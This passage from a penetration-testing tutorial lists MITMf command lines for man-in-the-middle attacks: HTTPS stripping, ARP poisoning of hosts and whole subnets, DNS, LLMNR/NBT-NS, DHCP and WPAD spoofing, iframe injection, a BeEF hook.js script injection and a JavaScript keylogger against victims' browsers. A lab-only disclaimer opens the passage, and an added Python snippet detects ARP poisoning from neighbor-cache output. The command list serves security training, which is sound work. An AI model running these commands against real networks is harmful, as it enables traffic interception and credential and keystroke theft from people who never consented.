Use cases of MITMf

The following are the various use cases of MITMf:

Keep in mind that all attacks should only be performed in a lab environment and only on networks for which you have obtained legal permission.
  • You can bypass HTTPS with MITMf:
python mitmf.py -i eth0 --spoof --arp --hsts --dns --gateway 10.10.10.1 --target 10.10.10.15
    • -i: Specifies the interface to execute MITMf against
    • --spoof: Tells MITMf to fake an identity
    • --arp: Performs redirection of traffic via ARP
    • --hsts: Loads the sslstrip plugin
    • --dns: Loads a proxy to modify DNS queries
    • --gateway: Specifies the gateway
    • --target: Specifies the target
  • You can perform an ARP poisoning attack between the gateway (10.10.10.1) and the entire subnet:
python mitmf.py -i eth0 --spoof --arp --gateway 10.10.10.1
  • You can perform ARP poisoning between the victims in a target range (10.10.10.10-10.10.10.50) and the gateway (10.10.10.1):
python mitmf.py -i eth0 --spoof --arp --target 10.10.10.10-10.10.10.50 --gateway 10.10.10.1
  • You can perform DNS spoofing while performing an ARP poisoning attack on a subnet and gateway (10.10.10.1):
python mitmf.py -i eth0 --spoof --dns --arp --target 10.10.10.0/24 --gateway 10.10.10.1
  • You can perform LLMNR/NBTNS/MDNS spoofing using MITMf:
python mitmf.py -i eth0 --responder --wredir --nbtns
  • You can perform a DHCP spoofing attack:
python mitmf.py -i eth0 --spoof --dhcp

The DHCP spoofing attack is useful during the post-exploitation phase.

The IP addressing scheme and subnet information are taken from the config file.
  • An HTML iframe can be injected using MITMf:
python mitmf.py -i eth0 --inject --html-url <malicious web URL>
  • A JavaScript script can be injected:
python mitmf.py -i eth0 --inject --js-url http://beef:3000/hook.js

You can perform ARP poisoning with the WPAD protocol as a rogue proxy server using the responder module:

python mitmf.py -i eth0 --spoof --arp --gateway 192.168.1.1 --responder --wpad
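
From the defending side, the ARP poisoning runs shown above leave a trace in the neighbor cache of affected hosts: the gateway's IP resolves to a different MAC address, and that MAC usually answers for a second IP as well. The following is an added example, not part of the original text or of MITMf; it checks constructed `ip neigh show` output, and the trusted gateway MAC and the function names are assumptions made for illustration.

```python
import re
from collections import defaultdict

# Constructed sample of `ip neigh show` output from a host on 10.10.10.0/24
# whose ARP cache has been poisoned: the gateway and a peer share one MAC.
SAMPLE_NEIGH = """\
10.10.10.1 dev eth0 lladdr 00:0c:29:aa:bb:cc REACHABLE
10.10.10.15 dev eth0 lladdr 00:0c:29:11:22:33 STALE
10.10.10.20 dev eth0 lladdr 00:0c:29:aa:bb:cc REACHABLE
10.10.10.30 dev eth0 FAILED
"""

# Matches only entries that carry a link-layer address (skips FAILED/INCOMPLETE).
LINE = re.compile(r"^(\S+) dev \S+ lladdr ([0-9a-fA-F:]{17})\b")

def parse_neigh(text):
    """Return {ip: mac} for every resolved neighbor entry."""
    table = {}
    for line in text.splitlines():
        m = LINE.match(line.strip())
        if m:
            table[m.group(1)] = m.group(2).lower()
    return table

def find_arp_anomalies(table, gateway_ip, trusted_gateway_mac):
    """Flag a changed gateway MAC and any MAC that answers for several IPs."""
    alerts = []
    seen = table.get(gateway_ip)
    if seen and seen != trusted_gateway_mac.lower():
        alerts.append(("gateway-mac-changed", gateway_ip, seen))
    by_mac = defaultdict(list)
    for ip, mac in table.items():
        by_mac[mac].append(ip)
    for mac, ips in sorted(by_mac.items()):
        if len(ips) > 1:
            alerts.append(("mac-claims-multiple-ips", ",".join(sorted(ips)), mac))
    return alerts

if __name__ == "__main__":
    # Assumed baseline: gateway MAC recorded while the network was known good.
    table = parse_neigh(SAMPLE_NEIGH)
    for alert in find_arp_anomalies(table, "10.10.10.1", "00:50:56:c0:00:08"):
        print(alert)
```

A MAC that answers for several IPs can be legitimate (a multi-homed router or proxy ARP), so treat that alert as a lead to verify; the gateway mismatch against a recorded baseline is the stronger signal.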

The following is an additional list of parameters that can be incorporated:

  • Screen Capture: The --screen option allows MITMf to use HTML5 canvas to get an accurate image of the client's web browser. Additionally, you can capture screenshots at a set time interval with the --interval seconds option.
  • Keylogger: The --jskeylogger option injects a JavaScript keylogger into the victim's web pages to capture keystrokes.

To view additional parameters for the MITMf tool, you can execute the python mitmf.py --help command.

Having completed this section, you now have the skill set required to perform various types of attacks using MITMf. In the next section, we will cover session hijacking attacks.
